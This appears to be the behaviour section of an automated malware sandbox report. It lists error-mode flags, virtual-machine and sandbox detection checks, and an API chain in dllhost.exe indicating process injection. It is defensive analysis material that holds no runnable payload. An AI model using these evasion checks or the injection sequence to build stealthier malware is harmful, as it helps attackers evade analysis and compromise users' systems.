Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dllhost.exe

Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,

37_2_0000000140001868

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000007.00000002.2143782680.000001A6A000B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A000B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxMiniRdrDN

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5496	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4394	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7945
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6260
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3426
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1584
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5517
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 445
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 409
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1650
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 626
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 385
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 378
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 372
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 366

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_34-245
Source: C:\Windows\System32\cmd.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_18-17050
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\System32\cmd.exe	API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.6 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe	API coverage: 9.1 %
Source: C:\Windows\System32\lsass.exe	API coverage: 4.9 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %
Source: C:\Windows\System32\dwm.exe	API coverage: 9.0 %
Source: C:\Windows\System32\wbem\WMIADAP.exe	API coverage: 8.2 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5052	Thread sleep count: 5496 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5052	Thread sleep count: 4394 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 7945 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 1735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844	Thread sleep count: 1584 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844	Thread sleep count: 5517 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792	Thread sleep time: -922337203685477s >= -30000s
